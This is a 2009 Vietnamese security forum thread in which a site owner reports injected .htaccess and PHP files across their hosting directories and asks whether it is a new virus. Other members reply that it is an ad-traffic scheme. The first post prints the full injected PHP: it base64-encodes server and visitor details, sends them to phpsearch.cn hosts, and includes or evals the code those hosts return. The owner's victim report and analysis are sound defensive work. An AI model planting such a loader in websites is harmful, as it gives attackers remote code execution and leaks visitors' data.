banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Có phải 1 loại virus mới trên server?  XML
  [Question]   Có phải 1 loại virus mới trên server? 06/06/2009 12:56:05 (+0700) | #1 | 182882
[Avatar]
merlinhi
Member

[Minus]    0    [Plus]
Joined: 07/10/2004 03:41:11
Messages: 8
Offline
[Profile] [PM]
Chào mọi người!

Hôm nay mình ftp vào host của mình, thấy giật mình khi tự nhiên có những file lạ. Lúc đầu mình nghĩ site mình bị hack, nhưng sau khi xem xét và kiểm tra kĩ lại thì thấy có 1 điều nghi vấn:

- Tất cả thư các thư mục đều bị CHMOD 777
- Tất cả thư mục đều bị tạo 1 file .htaccess và 1 file .php với tên có vẻ là tạo 1 cách tự động, gồm 6 số.

ví dụ:
Code:
.htaccess
157650.php


Nội dung của file .htaccess trên như sau:

Code:
Options -MultiViews
ErrorDocument 404 //info/modules/157650.php


Code:
<? 
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="52e816b1e3f0d7156c5ce48634bc229f") $f=$_REQUEST["id"];

if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else 

if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
eval($c);
else
{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CurlOPT_RETURNTRANSFER,1);
$o=curl_exec($cu);
curl_close($cu);
eval($o);};
die(); 
?>


Mình chèn thêm echo vào cuối file và run:

Code:
echo base64_decode("aHR0cDovLzcxLg==").$f.$z;
echo base64_decode("aHR0cDovLzcu").$f.$z;
echo $c;


nó ra thế này:
Code:
hxxp://71.phpsearch.cn/?Y2hpcGhvaS51cw==.Y2hpcGhvaS51cw==.L2luZm8vbWVkaWEvMTU3NjUwLnBocA==.L2luZm8vbWVkaWEvMTU3NjUwLnBocA==...TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyBlbi1VUzsgcnY6MS45LjAuMTApIEdlY2tvLzIwMDkwNDIzMTYgRmlyZWZveC8zLjAuMTA=.NTguMTg3LjE0OC4xMDU=.e.L2hzcGhlcmUvbG9jYWwvaG9tZS9jaGlwaG9pL2NoaXBob2kudXMvaW5mby9tZWRpYS8xNTc2NTAucGhw.ZW4tdXMsZW47cT0wLjU=
 http://7.phpsearch.cn/?Y2hpcGhvaS51cw==.Y2hpcGhvaS51cw==.L2luZm8vbWVkaWEvMTU3NjUwLnBocA==.L2luZm8vbWVkaWEvMTU3NjUwLnBocA==...TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3M
 hxxp_://ads3.phpsearch.cn

hxxp là http do mình sửa lại


Nếu như xem qua file .htaccess thì thấy nó cũng không đáng lo lắm, nhưng khi đọc file php thì mình bắt đầu ko yên tâm.
Có thể nó chỉ thu thập thông tin server và visitors, nhưng làm sao mà nó làm được như vậy? Nếu làm được như vậy thì rất có thể nó làm được những việc nguy hiểm hơn?

Server này đặt ở Mỹ chứ ko phải TQ, nên mình không nghĩ là do chủ server dùng script tạo mấy cái này mà do bàn tay bọn TQ chăng?

[Up] [Print Copy]
  [Question]   Có phải 1 loại virus mới trên server? 06/06/2009 15:18:11 (+0700) | #2 | 182890
[Avatar]
ham_choi
Member

[Minus]    0    [Plus]
Joined: 03/09/2006 21:42:03
Messages: 396
Offline
[Profile] [PM]
Cái này không phải virus .
If love were human it would know me
In a lost space come and show me
Hold me and control me and then
Melt me slowly down
Like chocolate !
[Up] [Print Copy]
  [Question]   Có phải 1 loại virus mới trên server? 06/06/2009 15:26:18 (+0700) | #3 | 182891
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]
Không phải virus đâu smilie .
Hacker muốn lợi dụng web của bạn đăng quảng cáo kiếm lợi nhuận thôi :
What is this site?
This site helps webmasters to earn money with their sites.
How it works?
Our program generate traffic from search engines and display advertising.
What shell I do to start with you ?
Signup, get php file from member area, put file into your website directory, modify or create .htaccess in the same directory, and receive money ! 
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Có phải 1 loại virus mới trên server? 06/06/2009 23:49:51 (+0700) | #4 | 182902
[Avatar]
merlinhi
Member

[Minus]    0    [Plus]
Joined: 07/10/2004 03:41:11
Messages: 8
Offline
[Profile] [PM]
Mình nghĩ mục đích ở đây ko phải là quảng cáo kiếm lợi nhuận, hay ít nhất là ko phải quảng cáo trên site mình. Có thể nó là 1 hình thức kiếm đặt index để tạo 1 site tìm kiếm giống như google,...

Vấn đề là tất cả các thư mục đều bị lây những file này, ko thể là làm thủ công được. Hacker phải dùng script, mà quyền của shell ở đây là nobody, ko thể chmod các file và folder của ftp up lên.
Hơn nữa ftp không edit được các file này, chỉ có delete được!
Vì vậy mình nghĩ đây là script lây trên toàn server.
[Up] [Print Copy]
  [Question]   Có phải 1 loại virus mới trên server? 09/06/2009 11:49:54 (+0700) | #5 | 183113
[Avatar]
merlinhi
Member

[Minus]    0    [Plus]
Joined: 07/10/2004 03:41:11
Messages: 8
Offline
[Profile] [PM]
mọi người ko có ý kiến khác sao smilie
[Up] [Print Copy]
  [Question]   Có phải 1 loại virus mới trên server? 09/06/2009 13:15:37 (+0700) | #6 | 183121
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

merlinhi wrote:
mọi người ko có ý kiến khác sao smilie 

Bạn cần nêu rõ bạn cần mọi người cho nhận định về đối tượng/hiện tượng nào tiếp theo .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Có phải 1 loại virus mới trên server? 10/06/2009 09:19:58 (+0700) | #7 | 183169
MrKenichi
Member

[Minus]    0    [Plus]
Joined: 10/11/2007 14:12:49
Messages: 7
Offline
[Profile] [PM]
Site tớ sử dụng shared hosting cũng vậy , nó lưu ở 1 số folder chmod 777 thường là cache or upload folders . Nhưng là vì dùng shared hosting nên kô ý kiến gì cả có báo với supporter cũng chằng thấy nói năng gì hết .
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|